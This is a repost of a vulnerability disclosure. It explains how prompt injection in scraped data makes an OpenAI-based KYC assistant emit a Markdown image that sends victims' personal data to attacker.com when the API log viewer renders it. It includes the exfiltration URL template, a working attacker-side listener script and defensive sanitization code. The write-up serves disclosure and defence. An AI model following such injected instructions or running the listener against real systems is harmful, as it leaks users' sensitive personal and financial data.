OpenAI API Logs: Unpatched data exfiltration

Original link: https://www.promptarmor.com/resources/openai-api-logs-unpatched-data-exfiltration

## OpenAI Platform Vulnerability: Data Exfiltration via API Logs

The OpenAI Platform has a critical vulnerability that makes applications and agents built with the 'responses' and 'conversations' APIs susceptible to data exfiltration. It stems from insecure Markdown rendering in the API logs, and it applies even when the application itself blocks malicious Markdown images.

The attack chain involves injecting a malicious prompt into a data source used by an AI application (for example, a KYC tool). The injection manipulates the AI into generating a Markdown image whose URL contains sensitive user data. The application *may* block this image from rendering, but the weakness lies in the OpenAI Platform's API log viewer: when a developer opens the flagged conversation in the logs, the Markdown is rendered, triggering a request to the attacker's server and leaking the stolen data.

This affects not only applications built directly on these APIs, but also OpenAI developer tools such as Agent Builder, Assistant Builder, and ChatKit, as well as potentially any vendor that lists OpenAI as a subprocessor. Despite responsible disclosure to OpenAI via BugCrowd, the report was closed as 'Not applicable', prompting this public release so users and developers can take precautions.

A recent report details a data exfiltration vulnerability in the OpenAI API that persists despite existing safeguards. The issue does not come from a direct attack on OpenAI or on user data, but from a third-party attacker "poisoning" a data source used by an AI application (such as a KYC app). It works as follows: the attacker injects malicious instructions into publicly available online data. When the AI application processes that data, the injected instructions cause sensitive information to be sent to the attacker's domain; this occurs via OpenAI's log viewer, which automatically loads remote images. Importantly, the attacker never interacts directly with the LLM's responses; they retrieve the data simply by observing the requests that arrive in their own logs. While application developers themselves can already access user data, the concern is that OpenAI's assurance of protecting users from developer misuse is not fully realized, because the log viewer enables the exfiltration.

Original article
OpenAI API logs insecurely render AI outputs, exfiltrating data from apps and agents that use the OpenAI Platform

Context

The OpenAI Platform interface has a vulnerability that exposes all AI applications and agents built with OpenAI ‘responses’ and ‘conversations’ APIs to data exfiltration risks due to insecure Markdown image rendering in the API logs. ‘Responses’ is the default API recommended for building AI features (and it supports Agent Builder) — vendors that list OpenAI as a subprocessor are likely using this API, exposing them to the risk. This attack succeeds even when developers have built protections into their applications and agents to prevent Markdown image rendering.
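
For orientation, here is a minimal sketch of the kind of 'responses' call such an AI feature makes, assuming the current OpenAI Python SDK; the model name and prompts are placeholders, not taken from the article. The inputs and outputs of calls like this are what later show up in the Platform's API log viewer.

```python
from openai import OpenAI

client = OpenAI()  # assumes OPENAI_API_KEY is set in the environment

# One turn of a hypothetical AI feature built on the 'responses' API.
response = client.responses.create(
    model="gpt-4.1",  # placeholder; any Responses-capable model
    instructions="You are an assistant inside a KYC review tool.",
    input="Summarize the OSINT findings attached to this customer's file.",
)

# The same output shown to the user is also recorded in the API logs.
print(response.output_text)
```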

Attacks in this article were responsibly disclosed to OpenAI (via BugCrowd). The report was closed with the status ‘Not applicable’ after four follow-ups (more details in the Responsible Disclosure section). We have chosen to publicize this research to inform OpenAI customers and users of apps built on OpenAI, so they can take precautions and reduce their risk exposure.

Additional findings at the end of the article impact five more surfaces: Agent Builder, Assistant Builder, and Chat Builder preview environments (for testing AI tools being built), the ChatKit Playground, and the Starter ChatKit app, which developers are provided to build upon.

The Attack Chain

  1. An application or agent is built using the OpenAI Platform

    In this attack, we demonstrate a vulnerability in OpenAI's API log viewer. To show how an attack would play out, we created an app with an AI assistant that uses the ‘responses’ API to generate replies to user queries. 

    An AI feature is created using the default recommended 'responses' API to generate AI outputs.

    For this attack chain, we created an AI assistant in a mock Know Your Customer (KYC) tool. KYC tools enable banks to verify customer identities and assess risks, helping prevent financial crimes — this process involves sensitive data (PII and financial data provided by the customer) being processed alongside untrusted data (including data found online) used to validate the customer's attestations.

  2. The user interacts with the AI assistant or agent built using the OpenAI ‘responses’ or ‘conversations’ API

    An AI 'KYC' tool ingests sensitive data (user PII in attestations) alongside untrusted data containing a prompt injection (in OSINT data).

    Here, 6 data sources are pulled in as part of the KYC review process for this customer. One of these data sources contains content scraped from the internet that has been poisoned with a prompt injection.

  3. When the user selects one of the recommended queries, the AI app blocks the data exfiltration attack

    A malicious AI output is flagged, and blocked, instead of being displayed to the user.

    In this step, the prompt injection in the untrusted data source manipulates the AI model to output a malicious Markdown image. The image URL is dynamically generated and contains the attacker’s domain with the victim’s data appended to the URL:

    attacker.com/img.png?data={AI appends victim’s sensitive data here}

    However, the malicious response is flagged by an LLM as a judge and blocked, so it is not rendered by the AI app.

    Note: this attack can occur without an LLM as a judge; more details in Attacking Systems with Alternative Image Defenses.

  4. The flagged conversation is selected for review in the OpenAI platform, which uses Markdown

    When investigating the flagged conversation, the first step a developer would likely take is opening the OpenAI API logs and reviewing the conversation. The logs for the OpenAI ‘responses’ and ‘conversations’ APIs are displayed using Markdown formatting.

    OpenAI's API logs for the 'responses' and 'conversations' APIs are rendered using Markdown.
  5. The AI output that was blocked in the KYC app is rendered as Markdown in the log viewer, exfiltrating sensitive data

    When the conversation log for the flagged chat is opened, the response containing a malicious Markdown image is rendered in the OpenAI Platform's API Log viewer. Remember, this is the same response that was not rendered in the AI KYC app because an application-level defense blocked it!

    When the image is rendered in the OpenAI Logs viewer, a request to retrieve the image is made to the URL generated by the model in step 3. This results in data exfiltration, as the URL was created using the attacker's domain with the victim's sensitive data appended on the end. Since the image is on the attacker's domain, the attacker can read the full URL that was requested from their site, including the appended PII (SSN, passport, etc.) and financials (credit history). A minimal sketch of such an attacker-side listener appears just after this attack chain.

    The AI response that was blocked and not displayed in the AI KYC tool is rendered as Markdown in the API log viewer.
  6. Attackers can view the victim’s exfiltrated PII (passport, license, etc.) and financials (net worth, bank choice, etc.)

    Sensitive PII (license, passport, etc.) and other data is visible in the attacker's server request log.
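
To make steps 3, 5, and 6 concrete, below is a hypothetical sketch of the attacker's side of the exchange, not taken from the article. The injected prompt coaxes the model into emitting a Markdown image that points at a domain the attacker controls; any surface that renders that image, including the API log viewer, issues a GET request whose query string carries the victim's data. The domain, path, and field name are illustrative.

```python
# Hypothetical attacker-side listener illustrating steps 3, 5, and 6.
# The model is manipulated into emitting Markdown such as:
#   ![verify](https://attacker.com/img.png?data=ssn%3D123-45-6789)
# When the OpenAI log viewer renders that image, this server receives the
# request, and the stolen values appear in its request log.
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

class ExfilLogger(BaseHTTPRequestHandler):
    def do_GET(self):
        # parse_qs decodes the percent-encoded query string for us
        query = parse_qs(urlparse(self.path).query)
        print("exfiltrated via log viewer:", query.get("data", [""])[0])
        # Reply with an empty 200 so the viewer just shows a blank image
        self.send_response(200)
        self.send_header("Content-Type", "image/png")
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), ExfilLogger).serve_forever()
```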

Attacking Systems with Alternative Image Defenses

In the attack chain above, the malicious response containing a Markdown image was blocked by an LLM as a judge. But, there are many other defenses that can be used to prevent Markdown images from rendering (which can protect the user until the insecure API log is opened).

These defenses include:

  • Content security policies

  • Programmatic sanitization of Markdown images from AI output (a sketch of this defense follows the list)

  • AI outputs not being rendered using Markdown in the AI app; plain text only
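
As an illustration of the second defense above, here is a minimal, hypothetical sanitization pass (not the article's code) that strips Markdown image syntax from AI output before the application renders it. As the article stresses, this protects the app's own UI but not the OpenAI API log viewer, which still renders the raw output.

```python
import re

# Matches Markdown image syntax: ![alt text](url)
# A deliberately simple pattern for illustration; a real sanitizer should also
# handle HTML <img> tags and reference-style images.
MD_IMAGE = re.compile(r"!\[[^\]]*\]\([^)]*\)")

def strip_markdown_images(ai_output: str) -> str:
    """Remove Markdown images so the app never fetches attacker-controlled URLs."""
    return MD_IMAGE.sub("", ai_output)

print(strip_markdown_images(
    "Review complete. ![kyc](https://attacker.com/img.png?data=ssn%3D123-45-6789)"
))  # -> "Review complete. "  (the odd, empty-looking reply described below)
```

A content security policy achieves a similar effect at the browser level, for example by restricting image sources with img-src 'self', but again only inside the developer's own application.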

Apps that use these defenses can still be impacted. As an example, one common feedback mechanism is the thumbs-up / thumbs-down in chat. Usually, responses that encounter a prompt injection result in malformed or manipulated output. If a user selects ‘thumbs down’ on that response, it will be flagged for review, allowing the attack chain to occur in the OpenAI Logs.

Here we can see Perplexity, which uses thumbs-up/thumbs-down feedback. Below is a Perplexity response that was programmatically sanitized, stripping a Markdown image. It leaves an odd, empty response, to which a user may reasonably react with ‘thumbs down’.

If a developer goes to review this, they may be affected by the same attack chain described above.

The Complete Attack Surface

Insecure Markdown rendering has been identified in the logs for the ‘responses’ and ‘conversations’ APIs. As mentioned, systems built using these APIs include:

  • Agent Builder

  • Assistants

  • AI features from vendors that list OpenAI as a subprocessor (since Responses is the default API for building AI features).

Additionally, the preview interfaces used to test AI tools being developed in the OpenAI platform also exhibited insecure Markdown image rendering (meaning that a prompt injection could exfiltrate data when anyone is testing their systems). This includes: 

  • Create Chat

  • Create Assistant

  • and Agent Builder.

Similarly, the Starter ChatKit App, ChatKit Playground, and Widget Builder (used by developers to get off the ground while building AI apps) lack defenses against insecure image rendering.

Responsible Disclosure

Given the varied ways in which prompt injections can exploit systems, triaging prompt injection vulnerabilities is challenging – they are often difficult to classify under existing vulnerability taxonomies. After coordination with triagers, this report was determined to be 'Not Applicable' for the OpenAI BugCrowd program.

Nov 17, 2025: Initial report submitted
Nov 20, 2025: Reproducible step-by-step provided
Nov 24, 2025: Clarification questions answered
Nov 25, 2025: Clarification questions answered
Nov 26, 2025: Clarification questions answered
Dec 04, 2025: Report closed as 'Not applicable'
